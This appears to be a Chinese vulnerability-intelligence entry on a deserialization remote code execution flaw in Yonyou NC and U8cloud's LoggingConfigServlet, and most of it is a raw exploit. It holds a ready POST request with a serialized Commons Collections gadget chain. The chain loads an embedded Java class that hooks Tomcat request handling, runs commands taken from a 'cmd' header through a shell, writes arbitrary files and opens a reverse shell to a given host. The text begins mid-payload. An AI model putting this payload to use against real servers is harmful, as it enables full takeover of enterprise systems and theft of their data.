xda\x07\x00\xdb\x0a\x00\x1c\x00\xdc\x08\x00\xdd\x07\x00\xde\x08\x00\xdf\x08\x00\xe0\x0a\x00\x1c\x00\xe1\x07\x00\xe2\x0a\x00C\x00\xe3\x0a\x00\xe4\x00\xd8\x08\x00\xe5\x0a\x00!\x00\xe6\x08\x00\xe7\x0a\x00!\x00\xe8\x08\x00\xe9\x0a\x00!\x00\xea\x0a\x00\x8f\x00\xeb\x08\x00\xec\x0a\x00!\x00\xed\x08\x00\xee\x09\x00\x8f\x00\xef\x0a\x00\xd4\x00\xf0\x09\x00\x8f\x00\xf1\x07\x00\xf2\x0a\x00C\x00\xf3\x0a\x00C\x00\xf4\x08\x00\xa6\x08\x00\xf5\x08\x00\xf6\x0a\x00\x8f\x00\xf7\x08\x00\xf8\x0a\x00\x8f\x00\xf9\x07\x00\xfa\x0a\x00L\x00\xfb\x07\x00\xfc\x0a\x00N\x00\xfd\x0a\x00\x8f\x00\xfe\x0a\x00N\x00\xff\x0a\x00N\x01\x00\x0a\x00N\x01\x01\x0a\x00/\x01\x02\x0a\x00L\x01\x03\x0a\x00!\x01\x04\x08\x01\x05\x0a\x01\x06\x01\x07\x0a\x00!\x01\x08\x08\x01\x09\x08\x01\x0a\x08\x01\x0b\x07\x01\x0c\x0a\x00]\x00\xad\x0a\x00]\x01\x0d\x08\x01\x0e\x0a\x00]\x01\x02\x08\x01\x0f\x08\x01\x10\x08\x01\x11\x08\x01\x12\x0a\x01\x13\x01\x14\x0a\x01\x13\x01\x15\x07\x01\x16\x0a\x01\x17\x01\x18\x0a\x00h\x01\x19\x08\x01\x1a\x0a\x00h\x01\x1b\x0a\x00h\x00\xc5\x0a\x00h\x01\x1c\x0a\x01\x17\x01\x1d\x0a\x01\x17\x01\x1e\x08\x01\x1f\x08\x01 \x0a\x01\x13\x01!\x07\x01\"\x0a\x00t\x01#\x0a\x00t\x01\x18\x0a\x01\x17\x01$\x0a\x00t\x01$\x0a\x00t\x01%\x0a\x01&\x01'\x0a\x01&\x01\x28\x0a\x01\x29\x01*\x0a\x01\x29\x01\x00\x05\x00\x00\x00\x00\x00\x00\x002\x0a\x00C\x01+\x0a\x01\x17\x01,\x0a\x00t\x01\x01\x08\x01-\x0a\x00/\x01.\x08\x01/\x08\x010\x0a\x00\xd4\x011\x0a\x00\x8f\x012\x08\x013\x08\x014\x08\x015\x08\x016\x08\x00\xa9\x08\x017\x07\x018\x01\x00\x0cBASE64_CHARS\x01\x00\x12Ljava/lang/String;\x01\x00\x0dConstantValue\x08\x019\x01\x00\x02ip\x01\x00\x04port\x01\x00\x13Ljava/lang/Integer;\x01\x00\x06<init>\x01\x00\x03\x28\x29V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x0aExceptions\x01\x00\x09loadClass\x01\x00%\x28Ljava/lang/String;\x29Ljava/lang/Class;\x01\x00\x09Signature\x01\x00\x28\x28Ljava/lang/String;\x29Ljava/lang/Class<*>;\x01\x00\x05proxy\x01\x00&\x28Ljava/lang/String;\x29Ljava/lang/String;\x01\x00\x05write\x01\x008\x28Ljava/lang/String;Ljava/lang/String;\x29Ljava/lang/String;\x01\x00\x0aclearParam\x01\x00\x04exec\x01\x00\x07reverse\x01\x00'\x28Ljava/lang/String;I\x29Ljava/lang/String;\x01\x00\x03run\x01\x00\x06decode\x01\x00\x16\x28Ljava/lang/String;\x29[B\x01\x00\x0aSourceFile\x01\x00\x07A4.java\x0c\x00\x97\x00\x98\x0c\x01:\x01;\x0c\x01<\x01=\x0c\x01>\x01?\x01\x00\x07threads\x0c\x01@\x01A\x07\x01B\x0c\x01C\x01D\x0c\x01E\x01F\x01\x00\x13[Ljava/lang/Thread;\x0c\x01G\x01H\x0c\x01I\x01J\x01\x00\x04http\x01\x00\x06target\x01\x00\x12java/lang/Runnable\x01\x00\x06this$0\x01\x00\x07handler\x01\x00\x1ejava/lang/NoSuchFieldException\x0c\x01K\x01?\x01\x00\x06global\x01\x00\x0aprocessors\x01\x00\x0ejava/util/List\x0c\x01L\x01M\x07\x01N\x0c\x01O\x01P\x0c\x01Q\x01R\x01\x00\x03req\x01\x00\x0bgetResponse\x01\x00\x0fjava/lang/Class\x0c\x01S\x01T\x01\x00\x10java/lang/Object\x07\x01U\x0c\x01V\x01W\x01\x00\x09getHeader\x01\x00\x10java/lang/String\x01\x00\x03cmd\x0c\x00\xa0\x00\xa1\x0c\x01X\x01Y\x01\x00\x09setStatus\x07\x01Z\x0c\x01[\x01\\\x0c\x01]\x01^\x01\x00$org.apache.tomcat.util.buf.ByteChunk\x0c\x00\x9c\x00\x9d\x0c\x01_\x01R\x01\x00\x08setBytes\x01\x00\x02[B\x0c\x01`\x01T\x01\x00\x07doWrite\x01\x00\x13java/lang/Exception\x01\x00\x13java.nio.ByteBuffer\x01\x00\x04wrap\x0c\x01a\x00\x9d\x01\x00 java/lang/ClassNotFoundException\x0c\x01b\x01c\x07\x01d\x01\x00\x00\x0c\x01e\x01f\x01\x00\x10command not null\x0c\x01g\x01H\x01\x00\x05#####\x0c\x01h\x01i\x0c\x00\xa4\x00\xa1\x01\x00\x01:\x0c\x01j\x01k\x01\x00\"command reverse host format error!\x0c\x00\x94\x00\x91\x0c\x01l\x01m\x0c\x00\x95\x00\x96\x01\x00\x10java/lang/Thread\x0c\x00\x97\x01n\x0c\x01o\x00\x98\x01\x00\x05$$$$$\x01\x00\x12file format error!\x0c\x00\xa2\x00\xa3\x01\x00\x05@@@@@\x0c\x00\xa5\x00\xa1\x01\x00\x0cjava/io/File\x0c\x00\x97\x01p\x01\x00\x18java/io/FileOutputStream\x0c\x00\x97\x01q\x0c\x00\xa9\x00\xaa\x0c\x00\xa2\x01r\x0c\x01s\x00\x98\x0c\x01t\x00\x98\x0c\x01u\x01H\x0c\x01v\x01H\x0c\x01w\x01x\x01\x00\x07os.name\x07\x01y\x0c\x01z\x00\xa1\x0c\x01\x7b\x01H\x01\x00\x03win\x01\x00\x04ping\x01\x00\x02-n\x01\x00\x17java/lang/StringBuilder\x0c\x01|\x01\x7d\x01\x00\x05 -n 4\x01\x00\x02/c\x01\x00\x05 -t 4\x01\x00\x02sh\x01\x00\x02-c\x07\x01~\x0c\x01\x7f\x01\x80\x0c\x00\xa5\x01\x81\x01\x00\x11java/util/Scanner\x07\x01\x82\x0c\x01\x83\x01\x84\x0c\x00\x97\x01\x85\x01\x00\x02\\a\x0c\x01\x86\x01\x87\x0c\x01Q\x01H\x0c\x01\x88\x01\x84\x0c\x01\x89\x00\x98\x01\x00\x07/bin/sh\x01\x00\x07cmd.exe\x0c\x00\xa5\x01\x8a\x01\x00\x0fjava/net/Socket\x0c\x00\x97\x01\x8b\x0c\x01\x8c\x01\x8d\x0c\x01\x8e\x01P\x07\x01\x8f\x0c\x01\x90\x01\x91\x0c\x01\x92\x01\x91\x07\x01\x93\x0c\x00\xa2\x01\x94\x0c\x01\x95\x01\x96\x0c\x01\x97\x01\x91\x01\x00\x1dreverse execute error, msg ->\x0c\x01\x98\x01H\x01\x00\x01!\x01\x00\x13reverse execute ok!\x0c\x01\x99\x01\x91\x0c\x00\xa6\x00\xa7\x01\x00\x16sun.misc.BASE64Decoder\x01\x00\x0cdecodeBuffer\x01\x00\x10java.util.Base64\x01\x00\x0agetDecoder\x01\x00&org.apache.commons.codec.binary.Base64\x01\x00\x02A4\x01\x00@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x01\x00\x0dcurrentThread\x01\x00\x14\x28\x29Ljava/lang/Thread;\x01\x00\x0egetThreadGroup\x01\x00\x19\x28\x29Ljava/lang/ThreadGroup;\x01\x00\x08getClass\x01\x00\x13\x28\x29Ljava/lang/Class;\x01\x00\x10getDeclaredField\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/reflect/Field;\x01\x00\x17java/lang/reflect/Field\x01\x00\x0dsetAccessible\x01\x00\x04\x28Z\x29V\x01\x00\x03get\x01\x00&\x28Ljava/lang/Object;\x29Ljava/lang/Object;\x01\x00\x07getName\x01\x00\x14\x28\x29Ljava/lang/String;\x01\x00\x08contains\x01\x00\x1b\x28Ljava/lang/CharSequence;\x29Z\x01\x00\x0dgetSuperclass\x01\x00\x08iterator\x01\x00\x16\x28\x29Ljava/util/Iterator;\x01\x00\x12java/util/Iterator\x01\x00\x07hasNext\x01\x00\x03\x28\x29Z\x01\x00\x04next\x01\x00\x14\x28\x29Ljava/lang/Object;\x01\x00\x09getMethod\x01\x00@\x28Ljava/lang/String;[Ljava/lang/Class;\x29Ljava/lang/reflect/Method;\x01\x00\x18java/lang/reflect/Method\x01\x00\x06invoke\x01\x009\x28Ljava/lang/Object;[Ljava/lang/Object;\x29Ljava/lang/Object;\x01\x00\x08getBytes\x01\x00\x04\x28\x29[B\x01\x00\x11java/lang/Integer\x01\x00\x04TYPE\x01\x00\x11Ljava/lang/Class;\x01\x00\x07valueOf\x01\x00\x16\x28I\x29Ljava/lang/Integer;\x01\x00\x0bnewInstance\x01\x00\x11getDeclaredMethod\x01\x00\x07forName\x01\x00\x15getContextClassLoader\x01\x00\x19\x28\x29Ljava/lang/ClassLoader;\x01\x00\x15java/lang/ClassLoader\x01\x00\x06equals\x01\x00\x15\x28Ljava/lang/Object;\x29Z\x01\x00\x04trim\x01\x00\x0astartsWith\x01\x00\x15\x28Ljava/lang/String;\x29Z\x01\x00\x05split\x01\x00'\x28Ljava/lang/String;\x29[Ljava/lang/String;\x01\x00\x08parseInt\x01\x00\x15\x28Ljava/lang/String;\x29I\x01\x00\x17\x28Ljava/lang/Runnable;\x29V\x01\x00\x05start\x01\x00\x15\x28Ljava/lang/String;\x29V\x01\x00\x11\x28Ljava/io/File;\x29V\x01\x00\x05\x28[B\x29V\x01\x00\x05flush\x01\x00\x05close\x01\x00\x08toString\x01\x00\x0fgetAbsolutePath\x01\x00\x07replace\x01\x00D\x28Ljava/lang/CharSequence;Ljava/lang/CharSequence;\x29Ljava/lang/String;\x01\x00\x10java/lang/System\x01\x00\x0bgetProperty\x01\x00\x0btoLowerCase\x01\x00\x06append\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/StringBuilder;\x01\x00\x11java/lang/Runtime\x01\x00\x0agetRuntime\x01\x00\x15\x28\x29Ljava/lang/Runtime;\x01\x00\x28\x28[Ljava/lang/String;\x29Ljava/lang/Process;\x01\x00\x11java/lang/Process\x01\x00\x0egetInputStream\x01\x00\x17\x28\x29Ljava/io/InputStream;\x01\x00\x18\x28Ljava/io/InputStream;\x29V\x01\x00\x0cuseDelimiter\x01\x00'\x28Ljava/lang/String;\x29Ljava/util/Scanner;\x01\x00\x0egetErrorStream\x01\x00\x07destroy\x01\x00'\x28Ljava/lang/String;\x29Ljava/lang/Process;\x01\x00\x16\x28Ljava/lang/String;I\x29V\x01\x00\x0fgetOutputStream\x01\x00\x18\x28\x29Ljava/io/OutputStream;\x01\x00\x08isClosed\x01\x00\x13java/io/InputStream\x01\x00\x09available\x01\x00\x03\x28\x29I\x01\x00\x04read\x01\x00\x14java/io/OutputStream\x01\x00\x04\x28I\x29V\x01\x00\x05sleep\x01\x00\x04\x28J\x29V\x01\x00\x09exitValue\x01\x00\x0agetMessage\x01\x00\x08intValue\x00!\x00\x8f\x00\x1e\x00\x01\x00\x0f\x00\x03\x00\x1a\x00\x90\x00\x91\x00\x01\x00\x92\x00\x00\x00\x02\x00\x93\x00\x02\x00\x94\x00\x91\x00\x00\x00\x02\x00\x95\x00\x96\x00\x00\x00\x09\x00\x01\x00\x97\x00\x98\x00\x02\x00\x99\x00\x00\x03\xb6\x00\x06\x00\x13\x00\x00\x02\x8e*\xb7\x00\x01\xb8\x00\x02\xb6\x00\x03L+\xb6\x00\x04\x12\x05\xb6\x00\x06M,\x04\xb6\x00\x07,+\xb6\x00\x08\xc0\x00\x09\xc0\x00\x09N-:\x04\x19\x04\xbe6\x05\x036\x06\x15\x06\x15\x05\xa2\x02X\x19\x04\x15\x062:\x07\x19\x07\xc7\x00\x06\xa7\x02C\x19\x07\xb6\x00\x0a:\x08\x19\x08\x12\x0b\xb6\x00\x0c\x9a\x00\x0d\x19\x08\x12\x0d\xb6\x00\x0c\x9a\x00\x06\xa7\x02%\x19\x07\xb6\x00\x04\x12\x0e\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x07\xb6\x00\x08:\x09\x19\x09\xc1\x00\x0f\x9a\x00\x06\xa7\x02\x02\x19\x09\xb6\x00\x04\x12\x10\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\x12\x11\xb6\x00\x06M\xa7\x00\x16:\x0a\x19\x09\xb6\x00\x04\xb6\x00\x13\xb6\x00\x13\x12\x11\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\xb6\x00\x13\x12\x14\xb6\x00\x06M\xa7\x00\x10:\x0a\x19\x09\xb6\x00\x04\x12\x14\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\x12\x15\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08\xc0\x00\x16\xc0\x00\x16:\x0a\x19\x0a\xb9\x00\x17\x01\x00:\x0b\x19\x0b\xb9\x00\x18\x01\x00\x99\x01[\x19\x0b\xb9\x00\x19\x01\x00:\x0c\x19\x0c\xb6\x00\x04\x12\x1a\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x0c\xb6\x00\x08:\x0d\x19\x0d\xb6\x00\x04\x12\x1b\x03\xbd\x00\x1c\xb6\x00\x1d\x19\x0d\x03\xbd\x00\x1e\xb6\x00\x1f:\x0e\x19\x0d\xb6\x00\x04\x12 \x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d\x19\x0d\x04\xbd\x00\x1eY\x03\x12\"S\xb6\x00\x1f\xc0\x00!:\x0f\x19\x0f\xc7\x00\x06\xa7\xff\x91*\x19\x0f\xb6\x00#\xb6\x00$:\x10\x19\x0e\xb6\x00\x04\x12%\x04\xbd\x00\x1cY\x03\xb2\x00&S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x11\x00\xc8\xb8\x00'S\xb6\x00\x1fW*\x12\x28\xb6\x00\x29:\x11\x19\x11\xb6\x00*:\x09\x19\x11\x12+\x06\xbd\x00\x1cY\x03\x12,SY\x04\xb2\x00&SY\x05\xb2\x00&S\xb6\x00-\x19\x09\x06\xbd\x00\x1eY\x03\x19\x10SY\x04\x03\xb8\x00'SY\x05\x19\x10\xbe\xb8\x00'S\xb6\x00\x1fW\x19\x0e\xb6\x00\x04\x12.\x04\xbd\x00\x1cY\x03\x19\x11S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x19\x09S\xb6\x00\x1fW\xa7\x00O:\x11*\x120\xb6\x00\x29:\x12\x19\x12\x121\x04\xbd\x00\x1cY\x03\x12,S\xb6\x00-\x19\x12\x04\xbd\x00\x1eY\x03\x19\x10S\xb6\x00\x1f:\x09\x19\x0e\xb6\x00\x04\x12.\x04\xbd\x00\x1cY\x03\x19\x12S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x19\x09S\xb6\x00\x1fW\xa7\x00\x0e\xa7\x00\x05:\x08\x84\x06\x01\xa7\xfd\xa7\xb1\x00\x07\x00\xa0\x00\xab\x00\xae\x00\x12\x00\xce\x00\xdc\x00\xdf\x00\x12\x01\xc4\x020\x023\x00/\x00?\x00D\x02\x85\x00/\x00G\x00b\x02\x85\x00/\x00e\x00\x85\x02\x85\x00/\x00\x88\x02\x7f\x02\x85\x00/\x00\x01\x00\x9a\x00\x00\x00\xde\x007\x00\x00\x00\x17\x00\x04\x00\x18\x00\x0b\x00\x19\x00\x15\x00\x1a\x00\x1a\x00\x1b\x00&\x00\x1d\x00?\x00\x1f\x00G\x00 \x00N\x00!\x00e\x00\"\x00p\x00#\x00u\x00$\x00\x7d\x00%\x00\x88\x00&\x00\x93\x00'\x00\x98\x00\x28\x00\xa0\x00*\x00\xab\x00-\x00\xae\x00+\x00\xb0\x00,\x00\xc1\x00.\x00\xc6\x00/\x00\xce\x001\x00\xdc\x004\x00\xdf\x002\x00\xe1\x003\x00\xec\x005\x00\xf1\x006\x00\xf9\x007\x01\x04\x008\x01\x09\x009\x01\x17\x00:\x013\x00;\x01>\x00<\x01C\x00=\x01K\x00>\x01d\x00?\x01\x8a\x00@\x01\x8f\x00A\x01\x92\x00C\x01\x9d\x00D\x01\xc4\x00F\x01\xcc\x00G\x01\xd3\x00H\x02\x0e\x00I\x020\x00N\x023\x00J\x025\x00K\x02=\x00L\x02]\x00M\x02\x7f\x00O\x02\x82\x00S\x02\x85\x00Q\x02\x87\x00\x1d\x02\x8d\x00U\x00\x9b\x00\x00\x00\x04\x00\x01\x00/\x00\x01\x00\x9c\x00\x9d\x00\x03\x00\x99\x00\x00\x009\x00\x02\x00\x03\x00\x00\x00\x11+\xb8\x002\xb0M\xb8\x00\x02\xb6\x004+\xb6\x005\xb0\x00\x01\x00\x00\x00\x04\x00\x05\x003\x00\x01\x00\x9a\x00\x00\x00\x0e\x00\x03\x00\x00\x00_\x00\x05\x00`\x00\x06\x00a\x00\x9b\x00\x00\x00\x04\x00\x01\x003\x00\x9e\x00\x00\x00\x02\x00\x9f\x00\x01\x00\xa0\x00\xa1\x00\x01\x00\x99\x00\x00\x00\xff\x00\x04\x00\x04\x00\x00\x00\x9b+\xc6\x00\x0c\x126+\xb6\x007\x99\x00\x06\x128\xb0+\xb6\x009L+\x12:\xb6\x00;\x99\x00;*+\xb7\x00<\x12=\xb6\x00>M,\xbe\x05\x9f\x00\x06\x12?\xb0*,\x032\xb5\x00@*,\x042\xb8\x00A\xb8\x00'\xb5\x00B\xbb\x00CY*\xb7\x00DN-\xb6\x00E\x12F\xb0+\x12G\xb6\x00;\x99\x00\"*+\xb7\x00<\x12=\xb6\x00>M,\xbe\x05\x9f\x00\x06\x12H\xb0*,\x032,\x042\xb6\x00I\xb0+\x12J\xb6\x00;\x99\x00\x0d**+\xb7\x00<\xb6\x00K\xb0**+\xb7\x00<\xb6\x00K\xb0\x00\x00\x00\x01\x00\x9a\x00\x00\x00R\x00\x14\x00\x00\x00k\x00\x0d\x00l\x00\x10\x00n\x00\x15\x00o\x00\x1e\x00q\x00\x29\x00r\x00/\x00s\x002\x00u\x009\x00v\x00F\x00w\x00O\x00x\x00S\x00y\x00V\x00z\x00_\x00\x7b\x00j\x00|\x00p\x00\x7d\x00s\x00\x7f\x00~\x00\x80\x00\x87\x00\x81\x00\x91\x00\x83\x00\x01\x00\xa2\x00\xa3\x00\x01\x00\x99\x00\x00\x00v\x00\x03\x00\x05\x00\x00\x006\xbb\x00LY+\xb7\x00MN\xbb\x00NY-\xb7\x00O:\x04\x19\x04,\xb8\x00P\xb6\x00Q\x19\x04\xb6\x00R\x19\x04\xb6\x00S\xa7\x00\x0b:\x04\x19\x04\xb6\x00T\xb0-\xb6\x00U\xb0\x00\x01\x00\x09\x00&\x00\x29\x00/\x00\x01\x00\x9a\x00\x00\x00&\x00\x09\x00\x00\x00\x8e\x00\x09\x00\x90\x00\x13\x00\x91\x00\x1c\x00\x92\x00!\x00\x93\x00&\x00\x96\x00\x29\x00\x94\x00+\x00\x95\x001\x00\x97\x00\x02\x00\xa4\x00\xa1\x00\x01\x00\x99\x00\x00\x00/\x00\x03\x00\x02\x00\x00\x00\x17+\x12:\x126\xb6\x00V\x12J\x126\xb6\x00V\x12G\x126\xb6\x00V\xb0\x00\x00\x00\x01\x00\x9a\x00\x00\x00\x06\x00\x01\x00\x00\x00\xa0\x00\x01\x00\xa5\x00\xa1\x00\x01\x00\x99\x00\x00\x01\xc3\x00\x04\x00\x09\x00\x00\x01'\x12W\xb8\x00X\xb6\x00YM+\xb6\x009L\x01N,\x12Z\xb6\x00\x0c\x99\x00@+\x12[\xb6\x00\x0c\x99\x00 +\x12\\\xb6\x00\x0c\x9a\x00\x17\xbb\x00]Y\xb7\x00^+\xb6\x00_\x12`\xb6\x00_\xb6\x00aL\x06\xbd\x00!Y\x03\x12\"SY\x04\x12bSY\x05+S:\x04\xa7\x00=+\x12[\xb6\x00\x0c\x99\x00 +\x12\\\xb6\x00\x0c\x9a\x00\x17\xbb\x00]Y\xb7\x00^+\xb6\x00_\x12c\xb6\x00_\xb6\x00aL\x06\xbd\x00!Y\x03\x12dSY\x04\x12eSY\x05+S:\x04\xb8\x00f\x19\x04\xb6\x00gN\xbb\x00hY-\xb6\x00i\xb7\x00j\x12k\xb6\x00l:\x05\x19\x05\xb6\x00m\x99\x00\x0b\x19\x05\xb6\x00n\xa7\x00\x05\x126:\x06\xbb\x00hY-\xb6\x00o\xb7\x00j\x12k\xb6\x00l:\x05\xbb\x00]Y\xb7\x00^\x19\x06\xb6\x00_\x19\x05\xb6\x00m\x99\x00\x0b\x19\x05\xb6\x00n\xa7\x00\x05\x126\xb6\x00_\xb6\x00a:\x06\x19\x06:\x07-\xc6\x00\x07-\xb6\x00p\x19\x07\xb0:\x05\x19\x05\xb6\x00T:\x06-\xc6\x00\x07-\xb6\x00p\x19\x06\xb0:\x08-\xc6\x00\x07-\xb6\x00p\x19\x08\xbf\x00\x04\x00\x90\x00\xfb\x01\x06\x00/\x00\x90\x00\xfb\x01\x1a\x00\x00\x01\x06\x01\x0f\x01\x1a\x00\x00\x01\x1a\x01\x1c\x01\x1a\x00\x00\x00\x01\x00\x9a\x00\x00\x00j\x00\x1a\x00\x00\x00\xa9\x00\x09\x00\xaa\x00\x0e\x00\xab\x00\x10\x00\xad\x00\x19\x00\xae\x00+\x00\xaf\x00?\x00\xb1\x00V\x00\xb3\x00h\x00\xb4\x00|\x00\xb6\x00\x90\x00\xb9\x00\x99\x00\xba\x00\xab\x00\xbb\x00\xbf\x00\xbc\x00\xd1\x00\xbd\x00\xf7\x00\xbe\x00\xfb\x00\xc2\x00\xff\x00\xc3\x01\x03\x00\xbe\x01\x06\x00\xbf\x01\x08\x00\xc0\x01\x0f\x00\xc2\x01\x13\x00\xc3\x01\x17\x00\xc0\x01\x1a\x00\xc2\x01 \x00\xc3\x00\x01\x00\xa6\x00\xa7\x00\x01\x00\x99\x00\x00\x01r\x00\x04\x00\x0c\x00\x00\x00\xe2\x12W\xb8\x00X\xb6\x00Y\x12Z\xb6\x00\x0c\x9a\x00\x09\x12qN\xa7\x00\x06\x12rN\xb8\x00f-\xb6\x00s:\x04\xbb\x00tY+\x1c\xb7\x00u:\x05\x19\x04\xb6\x00i:\x06\x19\x04\xb6\x00o:\x07\x19\x05\xb6\x00v:\x08\x19\x04\xb6\x00w:\x09\x19\x05\xb6\x00x:\x0a\x19\x05\xb6\x00y\x9a\x00`\x19\x06\xb6\x00z\x9e\x00\x10\x19\x0a\x19\x06\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x07\xb6\x00z\x9e\x00\x10\x19\x0a\x19\x07\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x08\xb6\x00z\x9e\x00\x10\x19\x09\x19\x08\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x0a\xb6\x00\x7d\x19\x09\xb6\x00\x7d\x14\x00~\xb8\x00\x80\x19\x04\xb6\x00\x81W\xa7\x00\x08:\x0b\xa7\xff\x9e\x19\x04\xb6\x00p\x19\x05\xb6\x00\x82\xa7\x00 N\xbb\x00]Y\xb7\x00^\x12\x83\xb6\x00_-\xb6\x00\x84\xb6\x00_\x12\x85\xb6\x00_\xb6\x00a\xb0\x12\x86\xb0\x00\x02\x00\xa7\x00\xad\x00\xb0\x00/\x00\x00\x00\xbf\x00\xc2\x00/\x00\x01\x00\x9a\x00\x00\x00n\x00\x1b\x00\x00\x00\xd1\x00\x10\x00\xd2\x00\x16\x00\xd4\x00\x19\x00\xd6\x00\"\x00\xd7\x00-\x00\xd8\x00B\x00\xd9\x00P\x00\xda\x00X\x00\xdb\x00`\x00\xdc\x00m\x00\xde\x00u\x00\xdf\x00\x82\x00\xe1\x00\x8a\x00\xe2\x00\x97\x00\xe4\x00\x9c\x00\xe5\x00\xa1\x00\xe6\x00\xa7\x00\xe8\x00\xad\x00\xe9\x00\xb0\x00\xea\x00\xb2\x00\xeb\x00\xb5\x00\xed\x00\xba\x00\xee\x00\xbf\x00\xf1\x00\xc2\x00\xef\x00\xc3\x00\xf0\x00\xdf\x00\xf2\x00\x01\x00\xa8\x00\x98\x00\x01\x00\x99\x00\x00\x00-\x00\x03\x00\x01\x00\x00\x00\x11**\xb4\x00@*\xb4\x00B\xb6\x00\x87\xb6\x00\x88W\xb1\x00\x00\x00\x01\x00\x9a\x00\x00\x00\x0a\x00\x02\x00\x00\x00\xf7\x00\x10\x00\xf8\x00\x09\x00\xa9\x00\xaa\x00\x01\x00\x99\x00\x00\x01\x1c\x00\x06\x00\x04\x00\x00\x00\xac\x01L\x12\x89\xb8\x002M,\x12\x8a\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d,\xb6\x00*\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xc7\x00C\x12\x8b\xb8\x002\x12\x8c\x03\xbd\x00\x1c\xb6\x00\x1d\x01\x03\xbd\x00\x1e\xb6\x00\x1fM,\xb6\x00\x04\x12\x8d\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d,\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xc7\x004\x12\x8e\xb8\x002M,\x12\x8d\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1dN-,\xb6\x00*\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xb0\x00\x03\x00\x02\x00-\x000\x00/\x005\x00q\x00t\x00/\x00y\x00\xa6\x00\xa9\x00/\x00\x01\x00\x9a\x00\x00\x00F\x00\x11\x00\x00\x01\x00\x00\x02\x01\x02\x00\x08\x01\x03\x00-\x01\x06\x000\x01\x04\x001\x01\x07\x005\x01\x09\x00L\x01\x0a\x00q\x01\x0d\x00t\x01\x0b\x00u\x01\x0f\x00y\x01\x11\x00\x7f\x01\x12\x00\x8f\x01\x13\x00\xa6\x01\x16\x00\xa9\x01\x14\x00\xaa\x01\x18\x00\x01\x00\xab\x00\x00\x00\x02\x00\xact\x00\x0bdefineClassuq\x00~\x00\x1a\x00\x00\x00\x02vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpvq\x00~\x00\x28sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x1a\x00\x00\x00\x00q\x00~\x00\x1cuq\x00~\x00\x1a\x00\x00\x00\x01q\x00~\x00\x1esq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00q\x00~\x00\"uq\x00~\x00\x1a\x00\x00\x00\x01q\x00~\x00$sq\x00~\x00\x0fsq\x00~\x00\x00w\x0c\x00\x00\x00\x10?@\x00\x00\x00\x00\x00\x00xsr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFactorI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}
用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/servlet/~ic/nc.bs.logging.config.LoggingConfigServlet |
WAF封禁路路径,等待发布补丁 |
729 |
0day |
漏洞详情
POST /servlet/~ic/nc.bs.logging.config.LoggingConfigServlet HTTP/1.1
{{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x07sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00*org.mozilla.javascript.DefiningClassLoader\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x01ur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00